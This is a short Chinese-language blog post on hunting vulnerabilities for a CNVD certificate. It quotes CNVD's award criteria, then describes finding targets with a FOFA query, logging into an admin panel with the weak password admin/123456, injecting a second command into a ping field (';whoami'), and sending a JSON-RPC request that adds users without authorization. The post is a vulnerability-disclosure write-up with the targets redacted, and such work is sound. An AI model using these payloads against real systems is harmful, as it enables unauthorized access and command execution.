前言:挖src挖郁悶了,閑來無事選擇挖一個cnvd來練練手,本次的漏洞都沒啥難度,企查查資產過了5000萬
說一下cnvd證書的下放標準
對于中危及中危以上通用型漏洞(CVSS2.0基準評分超過4.0分),以及涉及黨政機關、重要行業單位、科研院所、重要企事業單位(如:中央國有大型企業、部委直屬事業單位等)的高危事件型漏洞(后續對事件型漏洞證明頒發標準將參考中央網信辦頒布的關鍵基礎設施相關定義和分類),CNVD將給予原創漏洞證明(即CNVD漏洞證書,電子版),該證明可通過編號在CNVD官方網站進行查詢跟蹤。時限要求:按周對上一周歸檔漏洞且滿足證書頒發條件的進行批量制作。
事件型:高危 重要機構
通用型:中危及以上(評分4.0) 注冊資金5000w以上,黑盒的測試案例10或以上(3復現+7其他案例,其他案例不要求復現),白盒的得有源碼以及提供漏洞處代碼調試過程,包含截圖和原因。
過程:
fofa尋找目標
app=“xx目標系統”
admin ,123456 成功登錄管理員用戶(弱口令yyds)
RCE
發現這里有一個ping 的功能,我想這里應該會存在rce漏洞
ping 127.0.0.1 -c 4 ;whoami (成功rce)
越權
`POST xxxxxxxxx HTTP/1.1
Host: xxxxx
Content-Length: 180
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: xxxxxxxxxxxxxxxxxxxx
Referer: xxxxxxxxxxxxxxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{“jsonrpc”:“2.0”,“method”:“call”,“params”:[“635F7A20A38A4072899C14B3535CFBF5”,“admin”,“sessionAddUser”,{“username”:“123456”,“password”:“554e36b4db2bc61b606ca16e756b1f7d”}],“id”:11}`
這里將admin,換成任意用戶即可添加成功